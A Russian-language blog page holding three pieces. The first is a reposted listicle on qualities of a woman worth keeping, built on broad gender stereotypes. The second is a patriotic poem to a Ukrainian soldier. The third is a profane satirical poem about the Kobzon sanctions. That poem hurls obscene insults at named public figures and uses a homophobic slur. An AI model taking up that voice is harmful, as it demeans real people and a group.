Каждый мужчина нуждается в более умной женщине, которая поможет ему пройти по жизни. Говорят, что за каждым великим мужчиной скрывается еще более великая женщина. И это правда. Без женщины мужчина не больше чем обычный эгоист. Введите в его жизнь умную женщину — и у него появится смысл, направление и мудрость, чтобы не испортить все.

Она красивая

Красота кроется в глазах смотрящего: пока вы находите ее невероятно красивой (по вашему вкусу), держитесь за нее. Я вижу, что в наше время есть те, кто уделяет слишком много внимания красоте, и те, кто, напротив, восстает против этой концепции и не уделяет внешней стороне внимания вообще. Красота — это то, чем люди упиваются с тех самых пор, с которых они способны видеть; это не то, чего стоит стесняться; но это то, что мы должны научиться оценивать правильно.

Она добрая и заботливая

Хорошие люди — добрые люди. Если она не добрая — то нечего и говорить о том, чтобы она была в вашей жизни. Для женщины очень важным качеством является умение заботиться. Некоторые просто не хотят детей. В некоторых отношениях мужчина более заботливый, чем женщина. Тем не менее во всех женщинах заложен материнский инстинкт. Если вы хотите в один прекрасный день создать семью, то вы должны быть уверены, что нашли женщину, которая хочет (и подходит, чтобы) стать матерью.

Она энергичная

Жизнь время от времени бывает сложной. Она также бывает скучной и монотонной. Женщины созданы не для того, чтобы развлекать мужчин. Скорее, наоборот. Но с женщиной, которая энергична, подвижна и готова пуститься на поиски приключений, вы будете чувствовать себя более счастливым.

Она любит вас до глубины души

Это, безусловно, самое важное качество. Когда женщина любит вас — она любит вас всей душой. Это не так, как любят мужчины — они более эгоцентричны. У женщины есть способность всю себя целиком посвящать тем, кого она любит. Если вы нашли женщину, которая действительно любит вас, — вы нашли самый большой подарок во вселенной.

Она способна идти на компромиссы

Люди обоих полов упрямы. Мы любим вещи в том виде, в котором они есть, и не особенно открыты для изменений, которые, как нам кажется, не нужны. Но, так или иначе, отношения строятся на компромиссах. Если вы вообще хотите, чтобы отношения существовали, они должны существовать так. Найти женщину, которая склонна идти на компромисс, — это только половина битвы. Вам так же придется на них идти.

Она создает ощущение дома

Любить, любить глубоко — это значит найти свое место в мире, свой дом, впервые в жизни. Это знать, что вы именно там, где должны быть, и что вам больше никуда не нужно. Если вы смотрите в ее глаза и видите отражение своей души — то вы дома. Никогда не уходите.

Она более чем рада сказать вам, что вы не правы

Каждый мужчина нуждается в женщине, которая вытащит его из этой ерунды. Парни имеют странную способность принимать неверные решения и делать глупые вещи. Найдя женщину, которая будет помогать вам следовать вашему пути и говорить, где вы ошибаетесь, вы можете как улучшить, так и сломать себе жизнь.

Она сильная, но женственная

У каждого свой вкус на женщин, но все они являются сочетанием силы и женственности. Сильная женщина — партнер, который нужен каждому мужчине. Женственная женщина — это... ну, женщина. Эти два качества не являются противоположными. Зачастую они удачно сочетаются: женщина знает себе цену, но при этом гордится, что родилась именно женщиной.

Она страстная

Жизнь, наполненная страстью, стоит того, чтобы жить. Но жить страстной жизнью в одиночку просто невозможно. Страсть возникает между двумя живыми организмами, даже между двумя индивидуальностями. Страсть прекрасна тем, что она «заразна». Это самый желанный в мире «патоген».

Она ведомая

Я понимаю, что некоторые мужчины специально ищут себе жену, которая бы сидела дома. Я также понимаю, что есть множество женщин, мечтающих о том же. Этот тип женщин не для меня, но зачастую люди ищут именно его. Тем не менее вы по-прежнему хотите ведомую женщину. Если она хочет оставаться дома, готовить, убирать и заботиться о детях, убедитесь, что она именно тот тип женщины, который максимально удачно реализует себя в домашнем хозяйстве.

Она значит для вас все

Иногда мы безумно любим человека и не можем объяснить почему. По-честному, вам и не нужна причина. Если вы любите ее и не можете себе представить жизни без нее — не позволяйте себе ее отпускать. Если она значит для вас так много, вы должны это понимать. Зачастую люди не понимают, сколько другой человек значит для них, пока не потеряют его. Мы всегда думаем, что еще будет второй шанс, что, возможно, однажды мы сойдемся снова.

Может быть. Но также верно и обратное. Вы можете потерять ее навсегда. Вы можете потом жалеть долгие годы, что упустили самую важную вещь в вашей жизни. Не рискуйте.

Автор: Пол Хадсон



Источник: http://www.adme.ru/svoboda-psihologiya/esli-zhenschina-obladaet-etimi-12-kachestvami-nikogda-ne-otpuskajte-ee-928910/ © AdMe.ru

Солдату АТО

  • 02.03.15, 19:13

Я не знаю тебя,
Ты не знаешь меня, 
Но один мы народ 
И одна мы страна.
И пока я детей
Берегу от войны
Ты воюешь за нас, 
За таких же как мы.
И важнее тебя
Никого у нас нет,
Помни это, солдат, 
Доживи до побед.
Как бы не-было трудно
И страшно порой,
Мы с тобою, солдат,
И для нас ты ГЕРОЙ.
27.02.2015

Интересно кто автор? Мне понравилось

  • 19.02.15, 00:03

Политики! Дельцы Гудзона
на сто двадцатом этаже!
Да отъебитесь от Кобзона!
Вы ебанулись там уже!

Нашли, блять, демона и вора,
уничтожителя Земли!
Еще б Валуева-боксера
вы в список ёбаный внесли!

Запрет на въезд в другие страны?
Кобзону? Деду в парике?
А остальной чиновник сраный —
пусть ездит с паспортом в руке?

У нас придурков миллионы!
У нас на мудаке мудак!
Вот — свежий розовый Милонов!
Вот — шизофреник Железняк!

Вот наши психи: Яровая,
Мизулина и Луговой!
Бери любого, я не знаю!
Реально подойдет любой!

Вот Дугин — демон зла и кала!
Вот Соловьев — свистун войны!
Вам мудаков в России мало?
У нас их, сука, полстраны!

У нас тут сахарная вата
лежит и видит в сладких снах,
как тычет дулом автомата
в Европу или в Штаты нах!

Все бредят буферною зоной,
победой в Третьей мировой...
А вы пошли травить Кобзона!
У вас нормально с головой?

В Европе кто-то вылить хочет
на Путина холодный душ?
Ну вышли всех евонных дочек!
Обратно! К нам! В Россию! В глушь!

Пусть это подло и не тонко,
но раз вам похую престиж —
берешь Кабаеву с ребенком
и запрещаешь въезд в Париж!

А хочется лишить ирисок
чиновника и мудака?
Берешь Госдуму — полный список!
И всех сотрудников СК!

Роскомнадзор с Наркоконтролем!
Налоговую! Суд! ГАИ!
Там все бюджетники и тролли!
Тупые пёзды и хуи!

Там всяк рукою моет руку,
и лижет жопу за бабло!
Там адекватных граждан, сука,
найти реально тяжело!

Хватай не званием постарше —
как грязь греби лопатой их:
от сторожа до секретарши,
от рядовых до поварих!

А также их друзей и близких!
На каждом часть своей вины!
Но только знай, что будет в списке
всё население страны.

Поскольку нет у нас народа,
чтоб был не в деле нихуя:
хоть жук с Уральского завода,
хоть музыкант, хоть лично я.

А если так, то нет резона
в тот список человек на сто
добавить старика Кобзона.
Кто вам его добавил? Кто?

Кто консультант у вас отныне,
знаток России и персон?
Какой-нибудь поляк из Гдыни
засел в комиссии ООН?

Кто этот сраный правдоборец?
Гоните пидора взашей!
Он перейдет на Юнну Мориц
и доебётся до мышей!

18 февраля 2015

 Леонид Каганов

Сторінки:
1
2
3
4
5
6
7
8
25
попередня
наступна